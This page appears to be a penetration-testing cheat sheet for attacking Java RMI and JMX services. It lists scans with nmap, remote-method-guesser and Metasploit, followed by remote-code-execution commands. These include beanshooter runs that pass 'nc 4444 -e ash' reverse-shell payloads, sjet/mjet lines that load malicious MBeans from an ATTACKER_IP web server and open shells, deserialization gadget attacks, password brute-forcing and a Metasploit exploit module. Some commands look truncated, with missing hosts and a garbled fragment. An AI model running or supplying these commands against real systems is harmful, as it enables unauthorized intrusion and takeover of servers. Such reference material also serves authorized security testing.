Skip to content

Java RMI

Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.




  • Using nmap:

    $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
    1089/tcp open  java-rmi Java RMI
    | rmi-vuln-classloader:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    | rmi-dumpregistry:
    |   jmxrmi

  • Using remote-method-guesser:

    $ rmg scan --ports 0-65535
    [+] Scanning 6225 Ports on for RMI services.
    [+]   [HIT] Found RMI service(s) on (DGC)
    [+]   [HIT] Found RMI service(s) on  (Registry, DGC)
    [+]   [HIT] Found RMI service(s) on  (Registry, Activator, DGC)
    [+]   [6234 / 6234] [#############################] 100%
    [+] Portscan finished.
    $ rmg enum 9010
    [+] RMI registry bound names:
    [+]   - plain-server2
    [+]       --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
    [+]   - legacy-service
    [+]       --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
    [+]   - plain-server
    [+]       --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
    [+]           Endpoint: ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]

  • Using Metasploit

    use auxiliary/scanner/misc/java_rmi_server
    set RHOSTS <IPs>
    set RPORT <PORT>


If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.

RCE using beanshooter

  • List available attributes: beanshooter info 9010
  • Display value of an attribute: beanshooter attr 9010 java.lang:type=Memory Verbose
  • Set the value of an attribute: beanshooter attr 9010 java.lang:type=Memory Verbose true --type boolean
  • Bruteforce a password protected JMX service: beanshooter brute 1090
  • List registered MBeans: beanshooter list 9010
  • Deploy an MBean: beanshooter deploy 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url
  • Enumerate JMX endpoint: beanshooter enum 1090
  • Invoke method on a JMX endpoint: beanshooter invoke 1090 --signature 'vmVersion()'
  • Invoke arbitrary public and static Java methods:
    beanshooter model 9010 de.qtc.beanshooter:version=1 'new"/")'
    beanshooter invoke 9010 de.qtc.beanshooter:version=1 --signature 'list()'
  • Standard MBean execution: beanshooter standard 9010 exec 'nc 4444 -e ash'
  • Deserialization attacks on a JMX endpoint: beanshooter serial 1090 CommonsCollections6 "nc 4444 -e ash" --username admin --password admin

RCE using sjet or mjet


  • Jython
  • The JMX server can connect to a http service that is controlled by the attacker
  • JMX authentication is not enabled

Remote Command Execution

The attack involves the following steps: * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans * Creating a instance of the MBean on the target server, using JMX * Invoking the getMBeansFromURL method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. * The attacker finally invokes methods from the malicious MBean.

Exploit the JMX using siberas/sjet or mogwailabs/mjet

jython TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
jython TARGET_IP TARGET_PORT super_secret command "ls -la"
jython TARGET_IP TARGET_PORT super_secret shell
jython TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
jython TARGET_IP TARGET_PORT super_secret uninstall
jython --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"

jython TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
jython TARGET_IP TARGET_PORT command super_secret "whoami"
jython TARGET_IP TARGET_PORT command super_secret shell

RCE using Metasploit

use exploit/multi/misc/java_rmi_server
set RHOSTS <IPs>
# configure also the payload if needed